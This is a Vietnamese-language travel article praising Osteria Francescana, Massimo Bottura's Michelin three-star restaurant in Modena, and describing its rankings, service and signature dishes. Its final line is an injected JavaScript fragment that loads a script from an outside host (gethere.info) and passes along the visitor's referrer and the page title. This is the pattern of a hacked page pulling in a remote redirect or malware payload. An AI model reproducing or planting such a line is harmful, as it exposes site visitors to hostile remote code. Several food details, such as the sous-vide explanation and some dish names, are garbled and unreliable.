Osteria Francescana – Top 2 nhà hàng tốt nhất trên thế giới

Osteria Francescana là một nhà hàng thuộc sở hữu và điều hành bởi bếp trưởng Massimo Bottura tại Modena, Italy. Trong 2 năm liên tiếp 2013 & 2014, nhà hàng này đứng thứ 3 trong Top 50 Nhà hàng tốt nhất thế giới. Tuy nhiên, tính đến quý 1 năm 2015, nó đã vươn lên vị trí thứ 2 và chỉ xếp sau El Celler de Can Roca.

Osteria-Francescana (13)

Osteria Francescana được đánh giá cao với ba ngôi sao của Red Guide Michelin – cùng hạng với người dẫn đầu là de Can Roca.

Nói về chủ nhân của chuỗi nhà hàng nổi tiếng này, Massimo Bottura được đánh giá là đầu bếp tài ba nhất nước Ý cũng như nằm trong top 5 đầu bếp dẫn đầu trên thế giới. Đương nhiên vì thế mà tất cả những bữa ăn tại đây luôn nhận được sự háo hức lớn từ thực khách và chưa bao giờ, dù chỉ một lần làm họ thất vọng.

Osteria-Francescana (7)

Osteria-Francescana (14)

Đến với nhà hàng khi đã quá bữa tối, vào khoảng 8h30 nhưng bạn vẫn có thể nhận được một sự chào đón vô cùng nồng nhiệt bởi 12 nhân viên luôn túc trực sẵn ở cửa. Osteria Francescana luôn có tối thiểu 50 nhân viên phục vụ bất cứ ngày hay đêm.

Osteria-Francescana (1)

Osteria Francescana Restaurant tourism destinations

Osteria-Francescana (2)

Menu của quán được trình bày theo kiểu truyền thống, chút gì đó mộc mạc và chẳng có gì đặc biệt so với những nhà hàng sang trọng khác. Chúng tôi chắc chắn trong đó đơn nếm sẽ cung cấp kinh nghiệm tốt nhất. Những người phục vụ sẽ giúp bạn lựa chọn món ăn phù hợp bằng những gợi ý xác thực nhất.

Osteria-Francescana (18)

Osteria-Francescana (10)

Một bữa ăn đặc trưng tại Osteria Francescana bao gồm phần bánh mì nhỏ chỉ gồm 3 miếng; món “Tempura với Carpione” – đây là món ăn chỉ với miếng cá ướp cùng hành khô, giấm, nho khô và hạt thông kèm bánh mì giòn lót bên dưới; món “Rapid Macaroon” và “Baccala on a Tomato Pillow” – sốt cá thu với cà chua.

Đồ uống đặc trưng tại nhà hàng này là một loại rượu trắng với hương hoa dịu nhẹ được tinh chế độc quyền từ nho Trebbiano. Đây là một loại nho của Emilia-Romagna chỉ được sử dụng để sản xuất giấm Balsamic truyền thống. Thực khách nào may mắn lắm với có cơ hội thưởng thức loại rượu có một không hai này.

Bốn món ăn được yêu thích nhất ở Osteria Francescana là “From Goro to Hokkaido”; “Delta de Raviolo Po”; “Foie Gras Ice Cream Bar” và “Sparkling Muscat”:

Osteria-Francescana (12)

Osteria-Francescana (9)

Think Green

Osteria-Francescana (15)

Món “From Goro to Hokkaido” – nghe tên đã biết xuất xứ, được làm từ cua biển chưng với cà tím. Thịt cua cùng mực, trứng cá sẽ được sốt với cà tím sắt nhỏ và nhiều loại thảo mộc khác – được đặt bên trong vỏ cua trông cực kỳ tinh tế. Đây là món ăn được ưa thích nhất tại Osteria Francescana.

“Delta de Ravioli Po” với thành phần chính là xúc xích lợn, được nấu cùng với rượu vang nho Chenin Blanc và đậu Hà Lan Tagliolini. Massimo Bottura từng mô tả món ăn này như một bức chân dung màu trắng trên nền trắng của vùng nông thôn Emilia-Romagna.

“Foie Gras Ice Cream Bar” được chế biến cùng với loại giấm truyền thống có tên Balsamic từ Modena. Nó được phục vụ kèm nấm Botrytis vàng ngọt và ly rượu Pycolit. Botrytis là một loại nấm đôi quý hiếm. Khi chúng khô lại sẽ có vị ngọt của nho và được sử dụng như một món tráng miệng.

“Sparkling Muscat” được ăn kèm với salad làm từ các loại thảo mộc và hoa. Một món ăn nhẹ nhàng có vị ngọt nhẹ, thanh mát của những loại cây đặc trưng vùng Modena. Chính vì vậy, món ăn này chỉ duy nhất có và được nấu ngon ở Osteria Francescana.

Ở đây, các đầu bếp đều phải làm việc với cường độ cao. Một phần vì thực đơn tại nhà hàng hết sức cầu kỳ – khi đưa lên đĩa trông chúng thật đơn giản. Họ sử dụng một phương pháp nấu ăn có tên là “sous-vide” nghĩa là ủ món ăn với caramel trên bên ngoài một chiến hộp được sơn bột nhão đầy màu sắc. Cũng không hiểu rõ cốt lõi của phương pháp này, chỉ biết là thịt được ủ trong nhiều giờ thậm thí qua ngày để không làm mất đi độ thơm ngon của món ăn.

Osteria-Francescana (17)

Osteria-Francescana (11)

Bếp trưởng Massimo Bottura sẵn sàng chia sẻ với thức khách bất cứ điều gì về món ăn, cả những kinh nghiệm cá nhân cũng không phải là điều cần giữ bí mật tại đây. Đặc biệt, đối với những vị khách quý, khi ra về còn được nhà hàng tặng một quyển sổ cá nhân với những món ăn được ghi ghép bởi chính Bottura và bếp chính của ông – như một lời cảm ơn đã đến với Osteria Francescana.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;